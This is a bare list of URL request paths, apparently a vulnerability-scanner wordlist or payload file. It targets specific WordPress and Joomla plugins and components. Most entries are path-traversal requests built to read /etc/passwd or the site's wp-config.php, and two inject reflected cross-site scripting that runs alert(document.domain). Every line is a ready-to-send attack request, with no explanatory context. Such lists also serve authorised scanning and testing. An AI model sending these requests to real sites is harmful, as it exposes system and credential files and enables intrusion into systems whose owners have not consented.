/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
/comm.php?id=../../../../../../../../../../etc/passwd
/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
